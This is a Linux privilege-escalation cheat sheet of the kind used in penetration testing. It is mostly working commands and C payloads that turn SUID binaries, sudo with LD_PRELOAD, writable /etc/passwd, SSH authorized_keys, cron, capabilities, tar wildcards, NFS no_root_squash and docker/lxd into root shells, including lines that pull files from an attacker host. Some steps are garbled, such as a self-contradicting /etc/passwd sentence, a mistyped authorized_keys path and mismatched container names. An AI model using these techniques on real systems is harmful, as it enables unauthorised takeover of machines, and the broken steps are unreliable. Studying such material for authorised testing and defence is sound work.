Introduction

This section contains a set of techniques that can be used to perform privilege escalation on Linux systems.

Tools

This subsection contains valuable tools to identify potential privilege escalation vectors.

• Linpeas: Search for possible paths to escalate privileges on Linux/Unix*/MacOS hosts.

• LinEnum: Scripted Local Linux Enumeration & Privilege Escalation Checks.

• LinuxExploitSuggester: Detects known vulnerabilities in the Linux kernel.

• Linuxprivchecker: Enumerate basic system info and search for common privilege escalation vectors such as writable files, misconfigurations, clear-text passwords and applicable exploits.

• PsPy: Monitor Linux processes without root permissions

• Local Exploit Suggester: Metasploit module (post/multi/recon/local_exploit_suggester) for meterpreter sessions enumerates the system looking for potential privilege escalation vectors.

SUIDs Files

SUID file permission allows users to run an executable with the system permissions of the executable's owner or group.

Find SUIDs files with the following commands:

find / -perm -u=s -type f -exec ls -la {} + 2>/dev/null
find / -perm /4000 2>/dev/null

Once, the SUID file has been detected, look for it on GTFobins where you can find several ways to exploit the binary, escalating privileges.

Absolute path

There might be a case where a SUID binary executes a program indicating the whole path.

user@pwnbox:~$ strings /usr/local/bin/LaunchApache
[...]
/usr/sbin/service apache2 start

You can export a function named as the whole path command, obtaining a shell as the suid user.

user@pwnbox:~$ function /usr/sbin/service() {  /bin/bash -p; }
user@pwnbox:~$ export -f /usr/sbin/service
user@pwnbox:~$ /usr/local/bin/LaunchApache
root@debian:~# id

Relative path

If there is a SUID file that executes a command with a relative path, as you can see below, an attacker can change the PATH to run a malicious file.

user@pwnbox:~$ ls -la script 
-rwsr-xr-x 1 root root 1003 Jun  4  2021 script
user@pwnbox:~$ ltrace ./script 
setuid(0)= -1
setgid(0)= -1
system("ls")

In order to exploit the vulnerability, look at this example.

user@pwnbox:~$ echo -e '#!/bin/bash\nbash -p' > /tmp/ls
user@pwnbox:~$ chmod +x /tmp/ls
user@pwnbox:~$ PATH=/tmp:$PATH
user@pwnbox:~$ echo $PATH
/tmp:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
user@machine:~$ ./script 
root@machine:~# 

Shared Object Injection

When a binary is executed, it will seek to load the necessary objects. You can use strace in order to track the needed shared objects.

If a shared object is not found, you can create a malicious object to spawn a shell.

user@pwnbox:~$  find / -type f -perm -04000 -ls 2>/dev/null  
816078   12 -rwsr-sr-x   1 root     staff        9861 May 14  2017 /usr/local/bin/suid
user@pwnbox:~$ strace /usr/local/bin/suid 2>&1 | grep -i -E "open|access|no such file"
[...]
access("/etc/suid-debug", F_OK)         = -1 ENOENT (No such file or directory)
open("/lib/libc.so.6", O_RDONLY)        = 3
open("/home/user/.config/libcalc.so", O_RDONLY) = -1 ENOENT (No such file or directory)

Because you have got write permissions on the user's home directory, you can create a libcalc.so file.

user@pwnbox:~$ cat libcalc.c
#include <stdio.h>
#include <stdlib.h>

static void inject() __attribute__((constructor));

void inject() {
        setuid(0);
        system("/bin/bash -p");
}
user@pwnbox:~$ mkdir /home/user/.config
user@pwnbox:~$ gcc -shared -o /home/user/.config/libcalc.so -fPIC ./libcalc.c
TCM@debian:~$ /usr/local/bin/suid 
Calculating something, please wait...
bash-4.1# id
uid=0(root) gid=1000(user) egid=50(staff) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)

SUDO

Thanks to sudo, you can execute some binaries or commands as the user-specified. Through GTFobins you can obtain the way to escalate privileges depending on the command.

user@pwnbox:~$ cat /etc/sudoers
user@pwnbox:~$ sudo -s # Execute a shell as root
user@pwnbox:~$ sudo -l
User user may run the following commands on this host:
    (root) NOPASSWD: /usr/bin/vim

In order to specify the user, you need to provide the flag -u; by default, the user will be root.

LD_PRELOAD

LD_PRELOAD is an optional environmental variable containing one or more paths to shared libraries or shared objects. The loader will load before any other shared library, including the C runtime library (libc.so).

user@pwnbox:~$ sudo -l
Matching Defaults entries for user on this host:
    env_reset, env_keep+=LD_PRELOAD
User user may run the following commands on this host:
    (root) NOPASSWD: /usr/bin/vim

You can escalate privileges if you can execute a program with sudo and the LD_PRELOAD environment variable is kept.

user@pwnbox:~$ cat pre.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}
user@pwnbox:~$  gcc -fPIC -shared -o pre.so pre.c -nostartfiles
user@pwnbox:~$ sudo LD_PRELOAD=pre.so vim

/etc/passwd

If you have got write permission in the /etc/passwd file, then you can add your own password to the root user. This works because the system checks the password in /etc/passwd rather than in /etc/passwd.

-rw-rw-r-- 1 root user 2694 Mar  6  2020 /etc/passwd

To create the password, run the following command.

openssl passwd -1 -salt [salt] [password]
[...]
root:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash

Then, modify /etc/passwd and log in as root.

/etc/shadow

Read permissions

If you can read the files /etc/shadow and /etc/passwd, then you can create an unshadowed file allowing you to crack the stored hashes.

unshadow <PASSWORD-FILE> <SHADOW-FILE> > unshadowed.txt
john unshadowed.txt -w=<WORDLIST>

Write permissions

You can use the same method shown on the ``/etc/shadow` section to escalate privileges.

SSH Keys

authorized_keys

If you have got write permission to any authorized_keys file, you could append your own SSH public key into it, allowing you to gain access to the machine through SSH.

find / -name authorized_keys 2> /dev/null
curl http://<IP>/.ssh/id_rsa.pub >> ~/.ssh/authotized_keys

id_rsa

Might exist some users' SSH private keys stored in the system.

find / -name id_rsa 2> /dev/null
grep -iRl "private key" / 2>/dev/null

Once found them, you can obtain access as the user through SSH.

chmod 400 id_rsa
ssh -i id_rsa user@<IP>

Crontabs

There can be commands or files executed every specific time that an attacker can modify in order to execute arbitrary commands or files.

You can use the command cat /etc/crontab to view what cron jobs are scheduled.

user@pwnbox:~$ cat /etc/crontab 
# m h dom mon dow user  command
*/5  *    * * * root    /home/user/script.sh

However, enumerating the /etc/crontab file might not always work due to the lack of privileges, or maybe it will appear empty, but there might be contrab jobs. So, you can use pspy looking for cronjobs.

Capabilities

Linux capabilities provide some root privileges to a process, just as SUID does but more granularly. There are several ways to exploit these capabilities, but in this subsection will only appear how to exploit the cap_setuid capability.

# List user capabilities
user@pwnbox:~$ capsh --print 
# Find files with capabilities
user@pwnbox:~$ getcap -r / 2>/dev/null 
/usr/bin/python2.6 = cap_setuid+ep
/usr/bin/perl5.26.1 = cap_setuid+ep 

user@pwnbox:~$ /usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'
user@pwnbox:~$ /usr/bin/perl5.26.1 -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'

Wildcards

There might be Linux commands executed with elevated privileges that use wildcards.

In this example, you will see how to exploit the wildcard vulnerability for the tar binary. However, there are more ways to exploit this vulnerability as you can see here.

• hackingarticles.in

• materials.rangeforce.com

user@pwnbox:~$ cat /usr/local/bin/compress.sh
#!/bin/sh
cd /home/user
tar czf /tmp/backup.tar.gz *

For the command tar, we can exploit it with the following commands.

user@pwnbox:~$ echo "cp /bin/bash /tmp && chmod +s /tmp/bash" > shell.sh
user@pwnbox:~$ echo "" > --checkpoint=1
user@pwnbox:~$ echo "" > "--checkpoint-action=exec=sh shell.sh"

Once the script is executed you will have a root SUID bash file.

Note: Remember to execute it like this: /tmp/bash -p.

NFS (no_root_squash)

By default in Root Squashing is enabled in the NFS service, preventing any user who has access to the NFS share from gaining root access to the NFS volume. However, if disabled, it would allow you to create a SUID file, allowing a remote user to connect to the system as root.

As can be seen in the configuration no_root_squash is disabled.

cappucino@polonfs:~$ cat /etc/exports 
[...]
/home           *(rw,no_root_squash)

Hence, following the instructions of this example, you can escalate privileges.

kali@kali:~$ sudo mount -t nfs 10.10.181.37:home /tmp/mount -nolock
cappucino@polonfs:~$ cp /bin/bash .
kali@kali:/tmp/mount/cappucino$ sudo chown root bash
kali@kali:/tmp/mount/cappucino$ sudo chmod +s bash 
cappucino@polonfs:~$ ls -la
-rwsr-sr-x 1 root cappucino 1113504 Jul 15 13:07 bash
cappucino@polonfs:~$ ./bash -p
bash-4.4# id
uid=1000(cappucino) gid=1000(cappucino) euid=0(root)

If bash -p does not work, use the following method:

echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > x.c
gcc -static x.c -o x
sudo chown root x
sudo chmod u+s x
-bash-4.2$ ./x
bash-4.2# id
uid=0(root) gid=0(root) groups=0(root)

Containers

If you can run any docker or lxd, then you can create a container mounting the host file system, accessing every file as root.

Docker

docker images
docker run -v /:/mnt --rm -it <image> chroot /mnt sh

Lxd

Usually, there are no images installed on the system, so you need to build it manually and then transfer it to the target hosts.

# Attacker
cd /tmp/
git clone https://github.com/saghul/lxd-alpine-builder.git; cd lxd-alpine-builder/ 
sudo ./build-alpine
python -m SimpleHTTPServer 80
# Victim
wget <IP>/alpine.tar.gz
lxc image import ./alpine.tar.gz --alias myalpine
lxc image list #List images
lxc init myalpine ignite -c security.privileged=true
lxc config device add privesc mydevice disk source=/ path=/mnt/root recursive=true
lxc start privesc
lxc exec privesc /bin/sh

Kernel Exploits

This subsection contains a list of the most common kernel exploits you can find on a Linux system.

In order to know what to use you can execute the following command or the script Linux-exploiot-suggester.

uname -a

• RDS (CVE-2010-3904) <= 2.6.36-rc8: Link

• FULL NELSONN (CVE-2010-4258) <= 2.6.37: Link

• MEMPODIPPER (CVE-2012-0056) [ 2.6.39, 3.2.2 ]: Link

• DirtyCow (CVE-2016-5195) <= 3.19.0-73.8: Link

• Polkit’s pkexec(CVE-2021-4034): Link

References

• Linux - Privilege Escalation [PayloadAllTheThings]